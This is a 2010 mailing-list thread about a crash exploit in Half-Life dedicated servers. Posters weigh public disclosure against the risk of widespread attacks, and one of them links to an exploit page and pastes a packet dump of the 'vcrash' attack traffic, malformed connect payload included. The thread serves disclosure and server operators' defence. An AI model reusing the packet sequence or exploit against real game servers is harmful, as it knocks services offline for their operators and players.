I'm wondering what the hell the developer of that code was thinking...
"Oh, yes, there is the possibility of an invalid package, what do we do
then? Let's just kill the whole server... return;"

:(

-----Original Message-----
From: [email protected]
[mailto:[email protected]] On Behalf Of Cc2iscooL
Sent: Thursday, 4 March 2010 23:00
To: Half-Life dedicated Linux server mailing list
Subject: Re: [hlds_linux] HLDS exploit ?

It's kind of a double-edged sword really. Posting it makes Valve aware and
more apt to respond to it, but in the meantime it will circulate around the
internets and you'll have a bunch of crashing servers for the next few days.

On Thu, Mar 4, 2010 at 3:52 PM, EkaInfinitos <[email protected]> wrote:

> Thanks again for posting details about this vulnerability.
>
> Perhaps the disclosure will garner an expedited solution from Valve...
>
>
> -----Original Message-----
> From: [email protected]
> [mailto:[email protected]] On Behalf Of Damian Klimek
> Sent: Thursday, March 04, 2010 1434
> To: Half-Life dedicated Linux server mailing list
> Subject: Re: [hlds_linux] HLDS exploit ?
>
> Oh, I misspelled my address
>
> should be
>
> http://damianklimek.pl/hlds_exploit/
>
> Also - dump of running of vcrash in .pcap [Wireshark format]
>
> Interesting packets: 101, 103, 104, 107, 108.
>
> 22:29       ->
> 22:29
> 22:29       getchallenge valve
> 22:29
> 22:29       <-
> 22:29
> 22:29       A00000000 729366743 2
> 22:29
> 22:29       ->
> 22:29
> 22:29       connect 48 729366743
> "\prot\3\unique\-1\raw\steam\cdkey\19e5f1e722f4ab6d0d41c82f89c65295"
> 22:29
> 22:29       "\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\256\cl_lc\1\cl_lw\1\cl_updaterate\20\model\gordon\name\uKo8mqLIp6\topcolor\30\rate\25000"
> 22:29       HjNuHL"K0
> 22:29       -FRNd}K*KY"*Y,t!F%q_kIhtv2IW|0-rYz#2WL0F$>
> 22:29       V-9vDCgmY[b2|ebEE*~oC"""}#
> 22:29
> 22:29       <-
> 22:29
> 22:29       B 616 "83.11.32.104:61402" 1
> 22:29
> 22:29       ->
> 22:29
> 22:29       1E4>[F?i \D^DTDTDVT
> 22:29
>
>
> -> = to server
> <- = from server
>
>
> A fix for this is very important - does anyone mind playing a Clanwar while
> somebody runs this exploit?
>
>
> --
> Damian
>
> 2010/3/4 Saul Rennison <[email protected]>:
> > It is legal, and thanks for the sploits! LOLOZOLLOZZZ I R CRASHIN UR
> SERVAZ!
> >
> > Thanks,
> > - Saul.
> >
>
> _______________________________________________
> To unsubscribe, edit your list preferences, or view the list archives,
> please visit:
> http://list.valvesoftware.com/mailman/listinfo/hlds_linux